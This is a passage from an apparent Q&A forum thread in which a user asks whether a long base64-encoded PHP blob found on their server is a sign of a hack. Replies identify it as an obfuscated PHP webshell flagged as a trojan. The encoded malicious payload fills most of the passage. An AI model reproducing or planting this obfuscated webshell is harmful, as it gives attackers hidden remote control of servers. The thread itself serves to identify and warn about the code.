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'\x29\x29\x29\x29\x3B", "."); ?>
```

The server got hacked?
What is the purpose of this regexp?

Comment: This is a PHP webshell - De-obfuscated code : [here](http://www.unphp.net/decode/01f53a55ad8b348ce2d7530d5827450b/)

Answer (score 1):

**It is potentially malicious.**

Using a php decoder
yielded some de-obfuscated code.

Attempting to put the code through UnPHP.net caused my corporate servers to display an alert. 
[image: Alert]

[Here's the link my corporate server gave me.](http://fortiguard.com/search?type=av&q=PHP%252FAgent.U%2521tr)

It looks like a Trojan. That's as far as I can help.